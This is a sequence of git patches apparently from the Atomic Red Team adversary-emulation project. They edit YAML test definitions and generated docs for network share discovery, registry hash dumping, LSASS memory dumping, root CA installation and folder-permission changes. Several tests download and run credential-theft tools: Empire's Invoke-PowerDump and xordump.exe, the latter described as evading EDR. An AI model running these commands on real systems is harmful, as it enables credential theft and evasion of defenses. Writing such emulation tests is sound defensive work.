From a0a56474ae2b40ac1c2e5b4f3928c87993782455 Mon Sep 17 00:00:00 2001 From: Brian Thacker Date: Sun, 9 May 2021 17:43:33 -0500 Subject: [PATCH 01/16] Update T1135.yaml Split test 1 into two tests one for macos and one for Linux. Linux test added prereq commands and used a different tool. --- atomics/T1135/T1135.yaml | 28 +++++++++++++++++++++++++++- 1 file changed, 27 insertions(+), 1 deletion(-) diff --git a/atomics/T1135/T1135.yaml b/atomics/T1135/T1135.yaml index 8434f3ce..5590660e 100644 --- a/atomics/T1135/T1135.yaml +++ b/atomics/T1135/T1135.yaml @@ -7,7 +7,6 @@ atomic_tests: Network Share Discovery supported_platforms: - macos - - linux input_arguments: computer_name: description: Computer name to find a mount on. @@ -19,6 +18,33 @@ atomic_tests: smbutil view -g //#{computer_name} showmount #{computer_name} name: sh +- name: Network Share Discovery - linux + description: | + Network Share Discovery using smbstatus + supported_platforms: + - linux + input_arguments: + package_checker: + description: Package checking command. Debian - dpkg -s samba + type: string + default: rpm -q samba + package_installer: + description: Package installer command. Debian - apt install samba + type: string + default: yum install -y samba + dependency_executor_name: bash + dependencies: + - description: | + Package with smbstatus (samba) must exist on device + prereq_command: | + if #{package_checker} > /dev/null; then exit 0; else exit 1; fi + get_prereq_command: | + sudo #{package_installer} + executor: + command: | + smbstatus --shares + name: bash + elevation_require: true - name: Network Share Discovery command prompt auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb description: | From 7d494dcbce336fbefea9b2d63d54b7205bf99bf7 Mon Sep 17 00:00:00 2001 From: tjgeorgen <67936042+tjgeorgen@users.noreply.github.com> Date: Tue, 18 May 2021 10:51:47 -0400 Subject: [PATCH 02/16] Fix file path for PowerDump Import (#1466) seemed to download the module to $Env:Temp then run from .\, so I changed both to $Env:Temp --- atomics/T1003.002/T1003.002.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml index 081107a1..958fac22 100644 --- a/atomics/T1003.002/T1003.002.yaml +++ b/atomics/T1003.002/T1003.002.yaml @@ -94,7 +94,7 @@ atomic_tests: Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1" - Import-Module .\PowerDump.ps1 + Import-Module "$Env:Temp\PowerDump.ps1" Invoke-PowerDump name: powershell elevation_required: true From 6a570c2a4630cf0c2bd41a2e8375b5d5ab92f700 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 18 May 2021 14:52:23 +0000 Subject: [PATCH 03/16] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 2 +- atomics/T1003.002/T1003.002.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 71ce48ba..8a0b2d2b 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -22732,7 +22732,7 @@ credential-access: Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1" - Import-Module .\PowerDump.ps1 + Import-Module "$Env:Temp\PowerDump.ps1" Invoke-PowerDump name: powershell elevation_required: true diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md index d2b817bc..1516c1da 100644 --- a/atomics/T1003.002/T1003.002.md +++ b/atomics/T1003.002/T1003.002.md @@ -179,7 +179,7 @@ Executes a hashdump by reading the hasshes from the registry. Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "$Env:Temp\PowerDump.ps1" -Import-Module .\PowerDump.ps1 +Import-Module "$Env:Temp\PowerDump.ps1" Invoke-PowerDump ``` From bba82c0d5e3c52f076e6b3b0f30af28775bd139f Mon Sep 17 00:00:00 2001 From: Alex Flores Date: Tue, 18 May 2021 11:23:39 -0400 Subject: [PATCH 04/16] adds additional lsass dump test (#1467) Co-authored-by: Carrie Roberts --- atomics/T1003.001/T1003.001.yaml | 35 ++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 2014b6e2..4e5ee4cc 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -138,6 +138,7 @@ atomic_tests: del C:\windows\temp\dumpert.dmp >nul 2> nul name: command_prompt elevation_required: true + - name: Dump LSASS.exe Memory using Windows Task Manager auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607 description: | @@ -158,6 +159,7 @@ atomic_tests: 3. Dump lsass.exe memory: Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file. name: manual + - name: Offline Credential Theft With Mimikatz auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023 description: | @@ -354,3 +356,36 @@ atomic_tests: del #{output_file} name: powershell elevation_required: true + +- name: Dump LSASS.exe using imported Microsoft DLLs + description: | + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by + importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump + file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files. + + Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp. + supported_platforms: + - windows + input_arguments: + xordump_exe: + description: Path to xordump + type: Path + default: C:\Windows\Temp\xordump.exe + output_file: + description: Path where resulting dump should be placed + type: Path + default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp + dependencies: + - description: | + Computer must have xordump.exe + prereq_command: | + if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} + executor: + command: | + #{xordump_exe} -out #{output_file} -x 0x41 + cleanup_command: | + Remove-Item ${output_file} -ErrorAction Ignore + name: powershell + elevation_required: true From da2dd2b06b04c9bae5f8b034f28abe9ce576e3e0 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Tue, 18 May 2021 15:24:12 +0000 Subject: [PATCH 05/16] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1003.001/T1003.001.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 4e5ee4cc..eb902b08 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -358,6 +358,7 @@ atomic_tests: elevation_required: true - name: Dump LSASS.exe using imported Microsoft DLLs + auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697 description: | The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index eba1dedd..d80b426b 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -692,3 +692,4 @@ c75612b2-9de0-4d7c-879c-10d7b077072d e86f1b4b-fcc1-4a2a-ae10-b49da01458db 10447c83-fc38-462a-a936-5102363b1c43 fcbdd43f-f4ad-42d5-98f3-0218097e2720 +86fc3f40-237f-4701-b155-81c01c48d697 From e1989f2bec465a65e86ca62d422a66aaf16d233f Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 18 May 2021 15:24:18 +0000 Subject: [PATCH 06/16] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 37 +++++++++++++ atomics/T1003.001/T1003.001.md | 52 +++++++++++++++++++ 6 files changed, 93 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 8a3b34df..5381987b 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -228,6 +228,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell +credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 2a0d36ac..aed4c67a 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -26,6 +26,7 @@ credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minid credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell +credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index d9a87458..d3f145a5 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -450,6 +450,7 @@ - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows] - Atomic Test #10: Powershell Mimikatz [windows] - Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows] + - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows] - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1003.003 NTDS](../../T1003.003/T1003.003.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index d2bd5efb..c3d3acfa 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -50,6 +50,7 @@ - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows] - Atomic Test #10: Powershell Mimikatz [windows] - Atomic Test #11: Dump LSASS with .Net 5 createdump.exe [windows] + - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows] - T1557 Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1003.003 NTDS](../../T1003.003/T1003.003.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 8a0b2d2b..9c28f3bc 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -20953,6 +20953,43 @@ credential-access: & "#{createdump_exe}" -u -f #{output_file} $ID cleanup_command: 'del #{output_file} +' + name: powershell + elevation_required: true + - name: Dump LSASS.exe using imported Microsoft DLLs + auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697 + description: "The memory of lsass.exe is often dumped for offline credential + theft attacks. This can be achieved by\nimporting built-in DLLs and calling + exported functions. Xordump will re-read the resulting minidump \nfile and + delete it immediately to avoid brittle EDR detections that signature lsass + minidump files.\n\nUpon successful execution, you should see the following + file created $env:TEMP\\lsass-xordump.t1003.001.dmp.\n" + supported_platforms: + - windows + input_arguments: + xordump_exe: + description: Path to xordump + type: Path + default: C:\Windows\Temp\xordump.exe + output_file: + description: Path where resulting dump should be placed + type: Path + default: C:\Windows\Temp\lsass-xordump.t1003.001.dmp + dependencies: + - description: 'Computer must have xordump.exe + +' + prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1} + +' + get_prereq_command: 'Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" + -OutFile #{xordump_exe} + +' + executor: + command: "#{xordump_exe} -out #{output_file} -x 0x41\n" + cleanup_command: 'Remove-Item ${output_file} -ErrorAction Ignore + ' name: powershell elevation_required: true diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md index aad552e0..26822e04 100644 --- a/atomics/T1003.001/T1003.001.md +++ b/atomics/T1003.001/T1003.001.md @@ -48,6 +48,8 @@ The following SSPs can be used to access credentials: - [Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe](#atomic-test-11---dump-lsass-with-net-5-createdumpexe) +- [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls) +
@@ -564,4 +566,54 @@ echo ".NET 5 must be installed manually." "For the very brave a copy of the exec +
+
+ +## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs +The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by +importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump +file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files. + +Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| xordump_exe | Path to xordump | Path | C:\Windows\Temp\xordump.exe| +| output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass-xordump.t1003.001.dmp| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +#{xordump_exe} -out #{output_file} -x 0x41 +``` + +#### Cleanup Commands: +```powershell +Remove-Item ${output_file} -ErrorAction Ignore +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: Computer must have xordump.exe +##### Check Prereq Commands: +```powershell +if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} +``` + + + +
From a86a906ee8573870ad3dd05f1daf1839840e7f84 Mon Sep 17 00:00:00 2001 From: Isaac Sikkema Date: Thu, 20 May 2021 00:59:28 -0400 Subject: [PATCH 07/16] Fix platform incompatible executors in T1553.004 and T1518 (#1474) * Fix platform incompatible executors for T1553.004 * Fix platform incompatible executor for T1518 --- atomics/T1518/T1518.yaml | 2 +- atomics/T1553.004/T1553.004.yaml | 6 +++--- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/atomics/T1518/T1518.yaml b/atomics/T1518/T1518.yaml index e42eefd3..c6a329a9 100644 --- a/atomics/T1518/T1518.yaml +++ b/atomics/T1518/T1518.yaml @@ -33,7 +33,7 @@ atomic_tests: supported_platforms: - macos executor: - name: command_prompt + name: sh elevation_required: false command: | /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist diff --git a/atomics/T1553.004/T1553.004.yaml b/atomics/T1553.004/T1553.004.yaml index d3663bc7..668dc4fe 100644 --- a/atomics/T1553.004/T1553.004.yaml +++ b/atomics/T1553.004/T1553.004.yaml @@ -44,7 +44,7 @@ atomic_tests: description: Key we create that is used to create the CA certificate type: Path default: rootCA.key - dependency_executor_name: command_prompt + dependency_executor_name: sh dependencies: - description: | Verify the certificate exists. It generates if not on disk. @@ -74,7 +74,7 @@ atomic_tests: description: Key we create that is used to create the CA certificate type: Path default: rootCA.key - dependency_executor_name: command_prompt + dependency_executor_name: sh dependencies: - description: | Verify the certificate exists. It generates if not on disk. @@ -86,7 +86,7 @@ atomic_tests: executor: command: | sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}" - name: command_prompt + name: sh elevation_required: true - name: Install root CA on Windows auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1 From e04077bfe6a6b285dcd2fe581776fbe6e4b2937b Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 20 May 2021 04:59:49 +0000 Subject: [PATCH 08/16] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 4 ++-- atomics/Indexes/Indexes-CSV/macos-index.csv | 4 ++-- atomics/Indexes/index.yaml | 8 ++++---- atomics/T1518/T1518.md | 4 ++-- atomics/T1553.004/T1553.004.md | 16 ++++++++-------- 5 files changed, 18 insertions(+), 18 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 5381987b..ef068f6f 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -413,7 +413,7 @@ defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - defense-evasion,T1202,Indirect Command Execution,3,Indirect Command Execution - conhost.exe,cf3391e0-b482-4b02-87fc-ca8362269b29,command_prompt defense-evasion,T1553.004,Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh defense-evasion,T1553.004,Install Root Certificate,2,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh -defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,command_prompt +defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh defense-evasion,T1553.004,Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell defense-evasion,T1553.004,Install Root Certificate,5,Install root CA on Windows with certutil,5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f,powershell defense-evasion,T1218.004,InstallUtil,1,CheckIfInstallable method call,ffd9c807-d402-47d2-879d-f915cf2a3a94,powershell @@ -681,7 +681,7 @@ discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - discovery,T1518.001,Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell -discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,command_prompt +discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh discovery,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv index 2d4561e6..0aab232a 100644 --- a/atomics/Indexes/Indexes-CSV/macos-index.csv +++ b/atomics/Indexes/Indexes-CSV/macos-index.csv @@ -84,7 +84,7 @@ defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500 defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh defense-evasion,T1562.003,Impair Command History Logging,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh defense-evasion,T1562.003,Impair Command History Logging,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual -defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,command_prompt +defense-evasion,T1553.004,Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,1,chmod - Change file or folder mode (numeric mode),34ca1464-de9d-40c6-8c77-690adf36a135,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,2,chmod - Change file or folder mode (symbolic mode),fc9d6695-d022-4a80-91b1-381f5c35aff3,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,3,chmod - Change file or folder mode (numeric mode) recursively,ea79f937-4a4d-4348-ace6-9916aec453a4,bash @@ -133,7 +133,7 @@ discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b3 discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh -discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,command_prompt +discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 9c28f3bc..7ce3b646 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -32945,7 +32945,7 @@ defense-evasion: description: Key we create that is used to create the CA certificate type: Path default: rootCA.key - dependency_executor_name: command_prompt + dependency_executor_name: sh dependencies: - description: 'Verify the certificate exists. It generates if not on disk. @@ -32978,7 +32978,7 @@ defense-evasion: description: Key we create that is used to create the CA certificate type: Path default: rootCA.key - dependency_executor_name: command_prompt + dependency_executor_name: sh dependencies: - description: 'Verify the certificate exists. It generates if not on disk. @@ -32994,7 +32994,7 @@ defense-evasion: "#{cert_filename}" ' - name: command_prompt + name: sh elevation_required: true - name: Install root CA on Windows auto_generated_guid: 76f49d86-5eb1-461a-a032-a480f86652f1 @@ -48756,7 +48756,7 @@ discovery: supported_platforms: - macos executor: - name: command_prompt + name: sh elevation_required: false command: |- /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist diff --git a/atomics/T1518/T1518.md b/atomics/T1518/T1518.md index 5b210391..7925bb5f 100644 --- a/atomics/T1518/T1518.md +++ b/atomics/T1518/T1518.md @@ -75,10 +75,10 @@ Adversaries may attempt to get a listing of non-security related software that i -#### Attack Commands: Run with `command_prompt`! +#### Attack Commands: Run with `sh`! -```cmd +```sh /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist /usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist ``` diff --git a/atomics/T1553.004/T1553.004.md b/atomics/T1553.004/T1553.004.md index 43e59df9..c17ef4a6 100644 --- a/atomics/T1553.004/T1553.004.md +++ b/atomics/T1553.004/T1553.004.md @@ -90,14 +90,14 @@ echo sudo update-ca-certificates -#### Dependencies: Run with `command_prompt`! +#### Dependencies: Run with `sh`! ##### Description: Verify the certificate exists. It generates if not on disk. ##### Check Prereq Commands: -```cmd +```sh if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: -```cmd +```sh if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} ``` @@ -123,24 +123,24 @@ Creates a root CA with openssl | key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key| -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) +#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) -```cmd +```sh sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" "#{cert_filename}" ``` -#### Dependencies: Run with `command_prompt`! +#### Dependencies: Run with `sh`! ##### Description: Verify the certificate exists. It generates if not on disk. ##### Check Prereq Commands: -```cmd +```sh if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: -```cmd +```sh if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} ``` From 434c998df255883e0e205153231978ee680090c3 Mon Sep 17 00:00:00 2001 From: tlor89 <60741301+tlor89@users.noreply.github.com> Date: Thu, 20 May 2021 00:04:01 -0500 Subject: [PATCH 09/16] T1222.001 Test 5 prereq and cleanup (#1442) * T1222.001 Test 5 prereq and cleanup * Update T1222.001.yaml * variable name correction Co-authored-by: Toua Lor Co-authored-by: Carrie Roberts --- atomics/T1222.001/T1222.001.yaml | 16 +++++++++++++++- 1 file changed, 15 insertions(+), 1 deletion(-) diff --git a/atomics/T1222.001/T1222.001.yaml b/atomics/T1222.001/T1222.001.yaml index 4f03b7de..1d80a6f2 100644 --- a/atomics/T1222.001/T1222.001.yaml +++ b/atomics/T1222.001/T1222.001.yaml @@ -132,7 +132,21 @@ atomic_tests: description: Path of folder to recursively set permissions on type: path default: 'C:\Users\Public\*' + file_path: + description: Path of folder permission back + type: Path + default: '%temp%\T1222.001-folder-perms-backup.txt' + dependency_executor_name: command_prompt + dependencies: + - description: | + Backup of original folder permissions should exist (for use in cleanup commands) + prereq_command: | + IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) + get_prereq_command: | + icacls #{path} /save #{file_path} /t /q >nul 2>&1 executor: command: icacls "#{path}" /grant Everyone:F /T /C /Q + cleanup_command: | + icacls '#{path}' /restore #{file_path} /q >nul 2>&1 name: command_prompt - elevation_required: true \ No newline at end of file + elevation_required: true From bc03931ed30cba5ea7db54bc4d0d66da514657ef Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 20 May 2021 05:04:27 +0000 Subject: [PATCH 10/16] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 19 +++++++++++++++++++ atomics/T1222.001/T1222.001.md | 17 +++++++++++++++++ 2 files changed, 36 insertions(+) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 7ce3b646..4b5c3fb2 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -42995,8 +42995,27 @@ defense-evasion: description: Path of folder to recursively set permissions on type: path default: C:\Users\Public\* + file_path: + description: Path of folder permission back + type: Path + default: "%temp%\\T1222.001-folder-perms-backup.txt" + dependency_executor_name: command_prompt + dependencies: + - description: 'Backup of original folder permissions should exist (for use + in cleanup commands) + +' + 